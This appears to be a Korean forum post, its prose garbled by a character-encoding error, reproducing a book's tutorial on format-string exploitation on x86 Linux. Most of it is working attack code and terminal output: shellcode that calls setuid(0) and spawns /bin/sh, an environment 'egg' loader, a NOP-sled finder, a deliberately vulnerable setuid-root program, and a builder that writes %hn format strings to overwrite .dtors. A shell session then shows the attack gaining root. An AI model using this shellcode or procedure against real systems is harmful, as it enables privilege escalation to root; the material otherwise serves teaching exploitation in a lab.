Á¦°¡ »ê Ã¥¿¡ÀÖ´ø ¼³¸íÀÔ´Ï´Ù..
1. Eggshell
ÀÌ ÄÚµå´Â ½©Äڵ带 ¸Þ¸ð¸®¾ÈÀ¸·Î º¹»çÇϱâ À§Çؼ »ç¿ëµÈ´Ù.
"Format String Attack on alpha system" ¿¡¼ ÄÚµåÀÇ ÀϺθ¦ Âü°í ÇÏ¿´´Ù.
-----------------egg.c--------------------------
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5
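/*
 * One NOP byte (0x90) used to build the sled.  Written as a string literal so
 * it is NUL-terminated: the original `{ 0x90 }` had no terminator, and every
 * strcat(eggbuf, nop) read past the end of the array.
 */
char nop[] = "\x90";

/*
 * 31-byte Linux/x86 payload.  Decoding the bytes: push 0x17 / pop eax /
 * xor ebx,ebx / int 0x80 is setuid(0); the rest pushes "//bin/sh" on the
 * stack and calls execve() (eax = 0x0b).  It contains no NUL byte, so it
 * survives strcat()/putenv() intact.
 */
static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";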
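/*
 * Place an "egg" in the environment and start a shell that inherits it.
 *
 * The egg is the environment variable S=<250 NOPs><shellcode><align x 'A'>;
 * the "S=" prefix overwrites the first two NOP bytes.  A later exploit only
 * needs to land anywhere inside the sled.
 *
 * argv[1] (required): extra alignment bytes, added to DEF_ALIGN.
 * argv[2] (optional): egg buffer size; DEF_ALIGN is added to it
 *                     (default DEF_EGGSIZE).
 *
 * Returns 0 after the shell exits.  Exits 0 on usage error (kept from the
 * original) and -1 on bad numbers, a buffer that cannot hold the egg, or
 * allocation failure.  The original parsed with atoi() (junk silently became
 * 0), never checked that 250 + shellcode + align fit in the buffer, and built
 * the sled with strcat() on an unterminated one-byte array.
 */
int
main( int argc, char *argv[] )
{
	enum { NOP_COUNT = 250 };
	char *eggbuf;
	char *end;
	long v;
	int align = DEF_ALIGN;
	int eggsize = DEF_EGGSIZE;
	size_t sc_len = strlen(shellcode);
	size_t need;

	if ( argc < 2 ) {
		printf ("%s <align> <size>\n", argv[0] );
		exit(0);
	}

	/* strtol() instead of atoi(): reject junk, sign and overflow explicitly */
	errno = 0;
	v = strtol(argv[1], &end, 10);
	if (end == argv[1] || *end != '\0' || errno == ERANGE || v < 0 || v > INT_MAX - DEF_ALIGN) {
		fprintf(stderr, "error : bad align '%s'\n", argv[1]);
		exit(-1);
	}
	align = DEF_ALIGN + (int)v;

	if ( argc > 2 ) {
		errno = 0;
		v = strtol(argv[2], &end, 10);
		if (end == argv[2] || *end != '\0' || errno == ERANGE || v < 0 || v > INT_MAX - DEF_ALIGN) {
			fprintf(stderr, "error : bad size '%s'\n", argv[2]);
			exit(-1);
		}
		eggsize = (int)v + DEF_ALIGN;
	}

	/* sled + shellcode + padding + terminating NUL must fit in the buffer */
	need = NOP_COUNT + sc_len + (size_t)align + 1;
	if ((size_t)eggsize < need) {
		fprintf(stderr, "error : size %d too small, need at least %zu\n", eggsize, need);
		exit(-1);
	}

	if ( (eggbuf = malloc( eggsize )) == NULL ) {
		printf ("error : malloc \n");
		exit (-1);
	}

	/* set egg buf: zero it, then lay out sled, shellcode and alignment padding */
	memset( eggbuf, 0, eggsize );
	memset( eggbuf, 0x90, NOP_COUNT );                   /* NOP sled */
	memcpy( eggbuf + NOP_COUNT, shellcode, sc_len );
	memset( eggbuf + NOP_COUNT + sc_len, 'A', align );   /* alignment filler */

	/* the first two sled bytes become the variable name */
	memcpy ( eggbuf, "S=", 2 );

	/* putenv() keeps eggbuf itself in environ, so it must never be freed */
	putenv ( eggbuf );
	system("/bin/sh");
	return 0;
}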
--------------------------end here----------------------------------------
2. "find.c" À» ÀÌ¿ëÇÏ¿© ¿©·¯ºÐÀº ½ºÅÿ¡¼ÀÇ ½©ÄÚµåÀÇ À§Ä¡¸¦ ¾Ë ¼ö ÀÖ´Ù(GOOBLES
screen-exploit ·Î ºÎÅÍ).
¶ÇÇÑ ¾Æ·¡¿Í °°Àº ¹æ¹ýÀ¸·Îµµ ÁÖ¼Ò¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù.
a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb reports that vuln exited with an error (the %s chain dereferences garbage stack words).
e) x/2000 $ebp
f) search the dumped memory for the run of NOPs (0x90); the shellcode follows the sled.
-------------------------find.c-----------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/
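/*
 * Return the current stack pointer as an integer.
 *
 * x86 only: the inline asm reads %esp, so on x86-64 this yields just the low
 * 32 bits of %rsp.  The original had no return statement and relied on %eax
 * still holding the value when the function returned, which is undefined
 * behaviour; the asm output operand below makes the value explicit.
 */
unsigned long get_sp(void)
{
	unsigned int sp;
	__asm__ volatile ("movl %%esp, %0" : "=r" (sp));
	return sp;
}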
/* scan state shared with main(): last strncmp() result and the probe pointer */
int i = 0;
char *pointer;

/* twelve 0x90 bytes: the pattern that marks the start of the egg's NOP sled */
char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
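/*
 * Walk upward from the current stack pointer until a run of 12 NOP bytes is
 * found and print the address one past its first byte (as the original did).
 *
 * Returns 0 once the sled is found.  The scan reads memory beyond any object,
 * so it can fault if no egg is present; the original's "Sorry nimm GDB"
 * branch could never run because the loop only terminates on a match, and
 * `main()` with implicit int and bare `return;` are not valid C11.
 */
int main(void)
{
	size_t len = strlen(nops);

	fprintf(stderr, ". SUCHE!\n");
	pointer = (char *)get_sp();
	while ((i = strncmp(pointer, nops, len)) != 0)
		pointer++;
	/* %lx takes an integer; cast the pointer instead of passing it raw */
	fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", (unsigned long)(pointer + 1));
	return 0;
}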
--------------------------end here------------------------------------------
3. ÀÌ°ÍÀº ¹ö±×¸¦ Áý¾î³ÖÀº ÇÁ·Î±×·¥ÀÌ´Ù.
ÇÊÀÚ´Â ÀÌ°ÍÀ» Christophe BLAESS Christophe GRENIERFredereric RAYNALÀÇ "What are format bugs ?" ºÎÅÍ ÂüÁ¶Çß´Ù.
¾Æ¸¶µµ ÃÖ°íÀÇ Áöħ¼·Î Æò°¡µÈ´Ù.
--------------------------vuln.c------------------------------------------
/* vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
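/*
 * Targets for the function pointer in vuln(): helloWorld() is the one it
 * normally calls, accessForbidden() the one an attacker redirects it to.
 * Declared with (void): the empty-parentheses form is obsolescent.
 */
int helloWorld(void);
int accessForbidden(void);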
/*
 * Deliberately vulnerable function this exercise is built around.
 *
 * format: attacker-controlled text (argv[1] from main) that is passed to
 *         snprintf() as the FORMAT argument.  Every %x reads a word off the
 *         stack and every %n / %hn writes a count into one, which is what
 *         lets the caller overwrite memory such as ptrf or .dtors.
 * Returns whatever ptrf() returns: helloWorld() unless ptrf was overwritten.
 *
 * NOTE(review): the correct call is snprintf(buffer, sizeof buffer, "%s", format).
 * It is left as-is on purpose; the tutorial's offsets depend on this exact
 * frame layout (128-byte buffer followed by ptrf), so do not restyle it.
 */
int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();   /* overwrite target; its address is printed so the reader can aim at it */
memset(buffer, 0, sizeof(buffer));
printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);
ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
snprintf(buffer, sizeof buffer, format);   /* VULNERABLE: user data used as the format string */
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));   /* strlen() is size_t; %zu would be the correct conversion */
printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);
return ptrf();
}
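/*
 * Entry point: print the address of every argv[] entry (so the reader can
 * find their input on the stack), then hand argv[1] to vuln() and exit with
 * its return value.  Exits -1 when no argument is given.
 */
int main(int argc, char **argv) {
	int i;

	if (argc <= 1) {
		fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
		exit(-1);
	}
	/* %p requires a void *; passing char * unconverted is technically undefined */
	for (i = 0; i < argc; i++)
		printf("%d %p\n", i, (void *)argv[i]);
	exit(vuln(argv[1]));
}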
/* Benign target: print a greeting, flush it, report success (0). */
int helloWorld()
{
	fputs("Welcome in \"helloWorld\"\n", stdout);
	fflush(stdout);
	return 0;
}
/* Attacker's target: never called legitimately; prints a warning and returns 0. */
int accessForbidden()
{
	fputs("You shouldn't be here \"accesForbidden\"\n", stdout);
	fflush(stdout);
	return 0;
}
------------------------------end here-------------------------------
4. ÀÌ°Í ¿ª½Ã "What are format bugs ?" ·Î ºÎÅÍ °¡Á®¿ÔÀ¸¸ç ¸¶Áö¸· °ü¹®ÀÎ Formatstringbuilder "builder.c" ÀÌ´Ù.
ÇÁ·Î±×·¡¹ÖÀÌ µÇ½Ã´Â ºÐµéÀº ¼öÀÛ¾÷À¸·Î ÄÚµùÇؼ ½áµµ ¹«¹æÇÏ´Ù.
-----------------------------builder.c------------------------------
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/**
 The 4 bytes to overwrite are handled as two 16-bit halves: HH HH LL LL.
 Variables ending in "h" refer to the high half of the word (H),
 variables ending in "l" to the low half (L).
*/
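/*
 * Build a format string that stores the 32-bit `value` at `addr` using two
 * %hn conversions, one per 16-bit half.
 *
 * Layout of the result:
 *   <addr+2, 4 raw bytes><addr, 4 raw bytes>%.Nx%<k>$hn%.Mx%<k'>$hn
 * The two addresses are the first 8 characters, so the first padding is
 * (half - 8); the smaller half is written first so the second padding is the
 * difference.  Paddings are reduced modulo 0x10000 because %hn stores only
 * the low 16 bits of the character count; a padding that would be 0 is
 * emitted as 0x10000 instead, since "%.0x" still prints the argument's digits
 * and would throw the count off.
 *
 * addr:  address to overwrite (little-endian byte order, as in the original).
 * value: 32-bit value to store there.
 * where: printf argument index at which the first address word is found.
 * Returns a malloc()ed, NUL-terminated string; the caller owns it and must
 * free() it.  Exits on allocation failure or an unexpectedly long result.
 *
 * Fixes over the original: the high address is computed as addr + 2 on the
 * full word (the old b3 + 2 was wrong whenever the low byte was >= 0xfe);
 * paddings are printed with %u (with %hd, any value >= 32768 printed as a
 * negative precision and broke the format); a NUL address byte is reported,
 * because %c would write it into the string and truncate everything after it.
 */
char* build(unsigned int addr, unsigned int value, unsigned int where) {
	enum { LENGTH = 128 };   /* 8 bytes + 2 x ("%.65536x" + "%<10 digits>$hn") is well under this */
	unsigned int hi_addr = addr + 2;
	unsigned char lo[4], hi[4];
	unsigned int valh = (value >> 16) & 0xffff;   /* top half */
	unsigned int vall = value & 0xffff;           /* bottom half */
	unsigned int first, second;                   /* halves in the order they are written */
	unsigned int pos_first, pos_second;           /* %n$ positions matching that order */
	unsigned int pad1, pad2;
	char *buf;
	int n, k;

	/* little-endian byte split of both addresses; warn about NUL bytes */
	for (k = 0; k < 4; k++) {
		lo[k] = (addr >> (8 * k)) & 0xff;
		hi[k] = (hi_addr >> (8 * k)) & 0xff;
		if (lo[k] == 0 || hi[k] == 0)
			fprintf(stderr, "warning: address byte %d is NUL, the format string will be cut there\n", k);
	}

	fprintf(stderr, "adr : %u (%x)\n", addr, addr);
	fprintf(stderr, "val : %u (%x)\n", value, value);
	fprintf(stderr, "valh: %u (%.4x)\n", valh, valh);
	fprintf(stderr, "vall: %u (%.4x)\n", vall, vall);

	/* write the smaller half first so the second padding is non-negative */
	if (valh < vall) {
		first = valh;  pos_first = where;        /* high half -> addr+2, first address */
		second = vall; pos_second = where + 1;   /* low half  -> addr,   second address */
	} else {
		first = vall;  pos_first = where + 1;
		second = valh; pos_second = where;
	}
	/* counts are modulo 0x10000; the 8 address bytes already count towards the first %hn */
	pad1 = (first - 8) & 0xffff;
	pad2 = (second - first) & 0xffff;
	if (pad1 == 0) pad1 = 0x10000;
	if (pad2 == 0) pad2 = 0x10000;

	if (!(buf = malloc(LENGTH))) {
		fprintf(stderr, "Can't allocate buffer (%d)\n", LENGTH);
		exit(EXIT_FAILURE);
	}
	memset(buf, 0, LENGTH);

	n = snprintf(buf, LENGTH,
	             "%c%c%c%c"          /* high address (addr + 2) */
	             "%c%c%c%c"          /* low address (addr) */
	             "%%.%ux%%%u$hn"     /* padding + %hn for the half written first */
	             "%%.%ux%%%u$hn",    /* padding + %hn for the other half */
	             hi[0], hi[1], hi[2], hi[3],
	             lo[0], lo[1], lo[2], lo[3],
	             pad1, pos_first,
	             pad2, pos_second);
	if (n < 0 || n >= LENGTH) {
		fprintf(stderr, "format string too long (%d)\n", n);
		exit(EXIT_FAILURE);
	}
	return buf;
}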
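/*
 * Usage: build <addr(hex)> <value(hex)> <offset>
 *
 * Prints the generated format string on stdout (so it can be captured with
 * backticks) and an echo of it with its length on stderr.  Returns
 * EXIT_FAILURE on a missing or malformed argument.  The original checked
 * argc < 3 and then read argv[3], an off-by-one that dereferenced NULL when
 * the offset was omitted.
 */
int
main(int argc, char **argv) {
	char *buf;
	char *end;
	unsigned long addr, value;
	long where;

	if (argc < 4) {
		fprintf(stderr, "Usage: %s <addr(hex)> <value(hex)> <offset>\n", argv[0]);
		return EXIT_FAILURE;
	}

	errno = 0;
	addr = strtoul(argv[1], &end, 16);                        /* address */
	if (end == argv[1] || *end != '\0' || errno == ERANGE || addr > 0xffffffffUL) {
		fprintf(stderr, "bad address: %s\n", argv[1]);
		return EXIT_FAILURE;
	}
	errno = 0;
	value = strtoul(argv[2], &end, 16);                       /* value */
	if (end == argv[2] || *end != '\0' || errno == ERANGE || value > 0xffffffffUL) {
		fprintf(stderr, "bad value: %s\n", argv[2]);
		return EXIT_FAILURE;
	}
	errno = 0;
	where = strtol(argv[3], &end, 10);                        /* offset */
	if (end == argv[3] || *end != '\0' || errno == ERANGE || where < 0) {
		fprintf(stderr, "bad offset: %s\n", argv[3]);
		return EXIT_FAILURE;
	}

	buf = build((unsigned int)addr, (unsigned int)value, (unsigned int)where);
	fprintf(stderr, "[%s] (%zu)\n", buf, strlen(buf));
	printf("%s", buf);
	free(buf);
	return EXIT_SUCCESS;
}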
------------------------------------end here------------------------------------
ÀÚ..ÀÌÁ¦ºÎÅÍ ½½½½ ½ÃÀÛÇغ¸ÀÚ.
¿ì¼± ´ÙÀ½°ú °°Àº ¸í·É¾î·Î ÄÄÆÄÀÏ Çغ¸ÀÚ.
gcc -o vuln vuln.c
±×¸®°í setuid ·çÆ®ÀÇ ±ÇÇÑÀ» ÁØ´Ù.
chown root.root vuln
chmod 4775 vuln
hn> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c
vuln ÀÌ setuid root ·Î ¼³Á¤ÀÌ µÇ¾î ÀÖÀ½À» º¼ ¼ö ÀÖ´Ù.
2. eggshell À» ½ÃÀÛÇÑ´Ù(ÇöÀç ½ºÅþȿ¡ ÀÖÀ½).
hn> ./egg 5 6000
sh-2.05$
´Ù¸¥ Ãë¾àÁ¡À» »ç¿ëÇÒ ¼öµµ ÀÖÀ¸´Ï °¢ÀÚ Çغ¸µµ·Ï...
3. vuln À¸·Î ºÎÅÍ .dtors ¼½¼ÇÀ» ã´Â´Ù(ÀÌ°ÍÀÌ ¿À¹ö¶óÀÌÆ®¸¦ ÇÒ ¸Þ¸ð¸®ÀÇ ÁÖ¼ÒÀÌ´Ù).
sh-2.05$ objdump -s -j .dtors vuln
vuln: file format elf32-i386
Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$
¿©±â¼ À§Ä¡´Â 0x8049a64+4=0x8049a68 ÀÌ´Ù(¸Å¹ø 4À» ´õÇØ¾ß ÇÑ´Ù "Overwriting the .dtors section."¸¦ ÂüÁ¶Çϱ⠹ٶõ´Ù).
4.3¹ø°ú ¸¶Áö¸· ÀÎÀÚ´Â ¿ÀÇÁ¼ÂÀÌ´Ù.
°¢ ¹Ú½º¿¡ µû¶ó ÀÌ ¿ÀÇÁ¼ÂÀ» ´Þ¶óÁø´Ù.
ÇÊÀÚ´Â ¾Æ·¡¿Í °°ÀÌ ¼öµ¿À¸·Î ã´Â¹ýÀ» ÅÃÇß´Ù.
sh-2.05$ ./vuln AAAA%6\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
sh-2.05$ ./vuln AAAA%7\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
sh-2.05$ ./vuln AAAA%8\$x
0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- ¹ß°ß !!! A´Â16Áø¼ö·Î 41 À̱⠶§¹®¿¡
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"
¿©·¯ºÐÀº ¿©±â¼ ¿ÀÇÁ¼ÂÀÌ 8À̶ó´Â °ÍÀ» ¾Ë¼ö°¡ ÀÖ´Ù.
Âü°í : ¿©·¯ºÐÀº ÇÊÀÚ°¡ 6¿¡¼ ½ÃÀÛÇÑ°ÍÀ» µû¶óÇÏÁö ¸»°í 1ºÎÅÍ ÇØ º¸½Ã±â ¹Ù¶õ´Ù.
5. ÀÚ ÀÌÁ¦ ¿©±â¼ ¿ì¸®´Â 0x8049a68 ¿¡ ½á³ÖÀ» ½©ÄÚµåÀÇ À§Ä¡¸¦ ¾Ë¾Æ³»¾ß ÇÑ´Ù.
sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae
6. µåµð¾î Áغñ´Â ³¡³µ´Ù.
Áö±Ý±îÁö ¿ì¸®´Â ´ÙÀ½°ú °°Àº 3°³ÀÇ ÀÎÀÚµéÀ» ¾ò¾î³Â´Ù.
- where(0x8049a68)
- what(0xbffffbae)
- Offset(8)
¿©±â¼ Á¦ÀÏ ³ªÁßÀÇ »ç¿ëÀÚ¸¦ ´ÙÀ½°ú °°ÀÌ Ã¼Å©ÇÑ´Ù.
sh-2.05$ whoami
exp
±×¸®°í °ø°ÝÀ» ½ÃÀÛÇÑ´Ù.
sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`
adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0
before : ptrf() = 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"
sh-2.05# whoami
root <--------------- ·çÆ® ȹµæÇÑ °ÍÀ» º¼ ¼ö ÀÖ´Ù.!!!!!!
Âü°í : ¿©±â¼ ¼Ò°³ÇÏ´Â ¸ðµç ÀÎÀÚ´Â »óȲ¿¡ µû¶ó ´Þ¶óÁú ¼ö ÀÖ´Ù.
¾î¶°ÄÉ ÇÏ´ÂÁöµµ À߸ô°Ú¾î¿© Á¦¹ß¹æ¹ýÁ» |